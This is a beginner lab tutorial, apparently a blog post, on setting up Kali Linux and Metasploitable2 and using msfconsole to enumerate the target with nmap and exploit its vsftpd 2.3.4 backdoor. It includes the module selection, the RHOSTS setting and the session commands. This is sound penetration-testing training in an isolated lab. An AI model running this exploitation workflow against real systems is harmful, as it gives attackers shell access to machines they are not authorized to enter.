Exploiting Metasploitable2 Using msfconsole (Kali Linux Lab)

Exploiting Metasploitable2 Using `msfconsole` (Kali Linux Lab)

Introduction

msfconsole is the heart of the Metasploit Framework and one of the most powerful tools used by penetration testers to identify, exploit, and validate security vulnerabilities. In real-world security assessments as well as Capture The Flag (CTF) challenges, msfconsole is often used to automate and streamline exploitation workflows.

In this blog, we will explore how to use msfconsole from Kali Linux to exploit an intentionally vulnerable machine, Metasploitable2, in a safe and controlled lab environment.

Both machines are hosted on Oracle VM VirtualBox and configured on the same internal network. This setup allows us to simulate real attack scenarios while maintaining proper ethical boundaries.

The goal of this blog is to:

Understand what msfconsole is and why it is used
Learn how attackers interact with vulnerable services using Metasploit
Gain hands-on experience with a realistic exploitation lab

Note: All demonstrations in this blog are performed on machines owned by us or intentionally designed to be vulnerable. Never use these techniques on unauthorized systems.

In the next section, we will briefly look at the lab architecture before launching msfconsole and beginning the exploitation process.

Press enter or click to view image in full size

Setting Up `msfconsole` and Metasploitable2 (Step-by-Step Lab Setup)

Before launching any exploitation using msfconsole, we must ensure that both the attacker and the vulnerable target are properly set up and reachable. This section covers the complete setup process for msfconsole on Kali Linux and the Metasploitable2 vulnerable server.

1. Setting Up the Attacker Machine (Kali Linux)

Why Kali Linux?

Kali Linux comes pre-installed with hundreds of penetration testing tools, including the Metasploit Framework.

Verify Metasploit Installation

On Kali, Metasploit is installed by default. To verify:

msfconsole --version

If Metasploit is installed correctly, you will see version details.

— — — — — — — — — — — — — — — — —

Start `msfconsole`

msfconsole

On first launch, Metasploit may:

Initialize its database
Create required configuration files

You should now see the familiar msf6 > prompt.

This confirms that msfconsole is ready to use.

Press enter or click to view image in full size

— — — — — — — — — — — — — — — — —

2. Setting Up the Target Machine (Metasploitable2)

What is Metasploitable2?

Metasploitable2 is a deliberately vulnerable Linux machine created for practicing penetration testing techniques.

Start Metasploitable2 VM

Launch Metasploitable2 in Oracle VM VirtualBox
Wait until it boots to the login screen

Default Credentials

Username: msfadmin
Password: msfadmin

Check IP Address of Metasploitable2

ifconfig

Example output:

inet addr:192.168.56.101

Press enter or click to view image in full size

Note this IP address, as it will be used as the target (RHOSTS) inside msfconsole.

— — — — — — — — — — — — — — — — —

3. Ensure Both Machines Are on the Same Network

Both VMs must be configured with:

Network Adapter: Host-only Adapter
Name: VirtualBox Host -Only Ethernet Adapter

This ensures:

Kali ↔ Metasploitable2 communication
No internet exposure (safe lab)

Press enter or click to view image in full size

— — — — — — — — — — — — — — — — —

4. Test Connectivity (Very Important)

From Kali Linux:

ping 192.168.56.101

If you receive replies, your lab network is working correctly.

Press enter or click to view image in full size

— — — — — — — — — — — — — — — — —

5. Confirm Target Visibility Using Nmap

Before using Metasploit, attackers always enumerate first.

nmap -sV 192.168.56.101

You should see multiple intentionally vulnerable services, such as

FTP (vsftpd 2.3.4)
SSH
Samba
Tomcat

Press enter or click to view image in full size

This confirms that Metasploitable2 is ready for exploitation.

Setup Checklist

✔ Kali Linux boots successfully
✔ msfconsole launches without errors
✔ Metasploitable2 is accessible
✔ Both machines are on the same subnet
✔ Ping & Nmap scans work

Once all checks pass, your lab is fully prepared.

Basic `msfconsole` Commands (Getting Comfortable with the Interface)

Before jumping into exploitation, it’s important to understand the basic operating system–style commands and navigation used inside msfconsole. This section helps beginners feel confident while working in the Metasploit environment.

We are using Kali Linux with the Metasploit Framework.

Starting `msfconsole`

Open a terminal in Kali Linux and run:

msfconsole

Once loaded, you will see:

msf6 >

This prompt indicates that msfconsole is ready to accept commands.

Getting Help in `msfconsole`

Show All Commands

help

or simply:

This lists all available commands, similar to using help in an operating system shell.

Press enter or click to view image in full size

CommandDescriptionpwdShows the current module pathcdChange module directorylsList available modulesclearClear the screen

Example:

pwd
ls

These commands work inside Metasploit, not the Linux filesystem.

Searching for Modules

One of the most used commands:

search <keyword>

Example:

search ftp
search samba
search vsftpd

Press enter or click to view image in full size

This helps you quickly find:

Exploits
Auxiliary scanners
Payloads

Understanding Module Types

Metasploit is organized into modules:

Metasploit is organized into different module types, each designed for a specific purpose in the penetration testing lifecycle.

Press enter or click to view image in full size

You can list them using:

ls exploit
ls auxiliary

Using a Module

To select a module:

use exploit/unix/ftp/vsftpd_234_backdoor

Press enter or click to view image in full size

Once selected, the prompt changes to:

msf6 exploit(unix/ftp/vsftpd_234_backdoor) >

This tells you which module is currently active.

Viewing & Setting Options

Show Required Options

show options

Press enter or click to view image in full size

Set Target IP

set RHOSTS 192.168.56.101

Set Port (if needed)

set RPORT 21

To verify:

show options

Press enter or click to view image in full size

Running a Module

run

exploit

Both commands do the same thing.

Press enter or click to view image in full size

Session Management Basics

After successful exploitation:

sessions

Interact with a session:

sessions -i 1

Exit session:

Press enter or click to view image in full size

exit

Exiting Modules & `msfconsole`

In Metasploit, use back to leave the current module and return to the main console. Use quit or exit to close msfconsole completely.

Key Takeaways

✔ msfconsole feels like a mini operating system
✔ search, use, and show options are core commands
✔ Always understand a module before running it
✔ Enumeration comes before exploitation

Conclusion

In this blog, we explored how msfconsole, the core interface of the Metasploit Framework, can be used to exploit a vulnerable FTP service on Metasploitable2 from an attacker machine running Kali Linux.

Starting from proper lab setup and network configuration, we moved through the essential stages of a penetration test: service enumeration, exploit selection, configuration, and execution. By exploiting the outdated vsftpd 2.3.4 service, we demonstrated how a single vulnerable service can lead to full system compromise when basic security practices are ignored.

This exercise highlights several important lessons:

Enumeration is more important than exploitation
Outdated services pose serious security risks
Automation tools like msfconsole must be used with understanding, not blindly
Ethical hacking is about learning and improving security, not breaking systems

Practicing in a controlled environment like Metasploitable2 helps build a strong foundation for CTFs, real-world penetration testing, and defensive security awareness.

In future labs, this knowledge can be extended to:

Exploiting other services such as Samba and Tomcat
Using Meterpreter for advanced post-exploitation
Understanding how blue teams detect and prevent such attacks

Always remember: with great power comes great responsibility. Use these skills only where you have explicit permission.

Follow Kubesimplify on Hashnode, Twitter/X and LinkedIn. Join our Discord server to learn with us!

Command Palette